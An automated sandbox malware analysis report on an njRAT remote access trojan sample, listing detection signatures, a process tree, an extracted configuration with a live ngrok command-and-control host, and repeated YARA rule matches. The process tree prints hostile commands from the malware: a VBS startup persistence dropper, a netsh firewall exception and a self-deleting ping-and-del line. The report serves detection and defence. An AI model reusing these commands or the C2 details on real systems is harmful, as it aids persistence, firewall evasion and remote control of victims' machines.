Edit tour

Windows Analysis Report
nOZ2Oqnzbz.exe

Overview

General Information

Sample name:	nOZ2Oqnzbz.exe renamed because original name is a hash value
Original sample name:	acb30a04da7096c99877b47f3050190d.exe
Analysis ID:	1388810
MD5:	acb30a04da7096c99877b47f3050190d
SHA1:	89299ef483f4c276260193ae2fe4ab4f014c12aa
SHA256:	43f9346f00f00794f88d0d23b096b19e6bbd95ac7bde24b2619e139e1a7cc239
Tags:	exenjratRAT
Infos:

Detection

Njrat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Snort IDS alert for network traffic

Yara detected Njrat

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Command shell drops VBS files

Connects to many ports of the same IP (likely port scanning)

Contain functionality to detect virtual machines

Contains functionality to inject code into remote processes

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious names

Deletes itself after installation

Disables zone checking for all users

Drops PE files to the startup folder

Drops VBS files to the startup folder

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the windows firewall

Sample uses process hollowing technique

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Uses netsh to modify the Windows network and firewall settings

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Sigma detected: Wscript Shell Run In CommandLine

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

nOZ2Oqnzbz.exe (PID: 7116 cmdline: C:\Users\user\Desktop\nOZ2Oqnzbz.exe MD5: ACB30A04DA7096C99877B47F3050190D)

cmd.exe (PID: 6248 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nOZ2Oqnzbz.exe (PID: 6500 cmdline: C:\Users\user\Desktop\nOZ2Oqnzbz.exe MD5: ACB30A04DA7096C99877B47F3050190D)

WindowsServices.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" MD5: ACB30A04DA7096C99877B47F3050190D)

cmd.exe (PID: 6588 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WindowsServices.exe (PID: 1896 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: ACB30A04DA7096C99877B47F3050190D)

netsh.exe (PID: 6420 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 7092 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

WindowsServices.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" MD5: ACB30A04DA7096C99877B47F3050190D)

cmd.exe (PID: 5688 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WindowsServices.exe (PID: 6516 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: ACB30A04DA7096C99877B47F3050190D)

WindowsServices.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .. MD5: ACB30A04DA7096C99877B47F3050190D)

cmd.exe (PID: 5852 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WindowsServices.exe (PID: 6400 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: ACB30A04DA7096C99877B47F3050190D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
NjRAT	RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.	AQUATIC PANDA Earth Lusca Operation C-Major The Gorgon Group	http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/ http://blogs.360.cn/post/analysis-of-apt-c-37.html http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://asec.ahnlab.com/1369	https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Malware Configuration

Threatname: Njrat

{"Campaign ID": "David", "Version": "0.7d", "Install Name": "bf497657d005804b657fde8dd2d0cb46", "Install Dir": "TEMP", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Host": "0.tcp.in.ngrok.io", "Port": "19208", "Network Seprator": "Y262SUCZ4UJJ"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5567:$a1: get_Registry 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6744:$a3: Download ERROR 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6a0c:$a5: netsh firewall delete allowedprogram "
00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6964:$a1: netsh firewall add allowedprogram 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6af4:$b1: [TAP] 0x6a6c:$c3: cmd.exe /c ping
00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6934:$reg: SEE_MASK_NOZONECHECKS 0x6720:$msg: Execute ERROR 0x6780:$msg: Execute ERROR 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5567:$a1: get_Registry 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6744:$a3: Download ERROR 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6a0c:$a5: netsh firewall delete allowedprogram "
00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6964:$a1: netsh firewall add allowedprogram 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6af4:$b1: [TAP] 0x6a6c:$c3: cmd.exe /c ping
00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6934:$reg: SEE_MASK_NOZONECHECKS 0x6720:$msg: Execute ERROR 0x6780:$msg: Execute ERROR 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5567:$a1: get_Registry 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6744:$a3: Download ERROR 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6a0c:$a5: netsh firewall delete allowedprogram "
0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6964:$a1: netsh firewall add allowedprogram 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6af4:$b1: [TAP] 0x6a6c:$c3: cmd.exe /c ping
0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6934:$reg: SEE_MASK_NOZONECHECKS 0x6720:$msg: Execute ERROR 0x6780:$msg: Execute ERROR 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5567:$a1: get_Registry 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6744:$a3: Download ERROR 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6a0c:$a5: netsh firewall delete allowedprogram "
0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6964:$a1: netsh firewall add allowedprogram 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6af4:$b1: [TAP] 0x6a6c:$c3: cmd.exe /c ping
0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6934:$reg: SEE_MASK_NOZONECHECKS 0x6720:$msg: Execute ERROR 0x6780:$msg: Execute ERROR 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5567:$a1: get_Registry 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6744:$a3: Download ERROR 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6a0c:$a5: netsh firewall delete allowedprogram "
00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6964:$a1: netsh firewall add allowedprogram 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6af4:$b1: [TAP] 0x6a6c:$c3: cmd.exe /c ping
00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6934:$reg: SEE_MASK_NOZONECHECKS 0x6720:$msg: Execute ERROR 0x6780:$msg: Execute ERROR 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
